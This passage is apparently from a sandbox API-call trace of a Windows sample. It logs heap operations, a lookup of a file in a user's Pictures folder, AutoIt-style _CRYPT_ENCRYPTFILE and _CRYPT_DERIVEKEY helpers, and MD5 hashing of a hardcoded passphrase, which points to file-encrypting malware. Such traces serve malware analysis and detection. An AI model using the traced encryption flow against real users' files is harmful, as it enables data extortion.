HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0088.987] CloseHandle (hObject=0x258) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0088.988] FreeLibrary (hLibModule=0x772d0000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.988] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0088.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0088.989] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0088.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.990] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24491a80, ftCreationTime.dwHighDateTime=0x1d5e8ab, ftLastAccessTime.dwLowDateTime=0xf883cf30, ftLastAccessTime.dwHighDateTime=0x1d5eb70, ftLastWriteTime.dwLowDateTime=0xf883cf30, ftLastWriteTime.dwHighDateTime=0x1d5eb70, nFileSizeHigh=0x0, nFileSizeLow=0xd297, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="KI1iqiSuYI.jpg", cAlternateFileName="KI1IQI~1.JPG")) returned 0x41ac540 [0088.990] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0088.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0088.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0088.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0088.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.991] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.991] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0088.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.991] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0088.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0088.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0088.991] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0088.992] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0088.992] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.992] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0088.992] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.992] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.992] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.992] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.992] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.992] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca4d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0088.993] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0088.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0088.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0088.993] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0088.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0088.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0088.993] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.993] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca4d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0088.993] CryptHashData (hHash=0x41ac740, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0088.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0088.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0088.994] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0088.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0088.995] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0088.995] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0088.996] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0088.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0088.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0088.997] RtlAllocateHeap 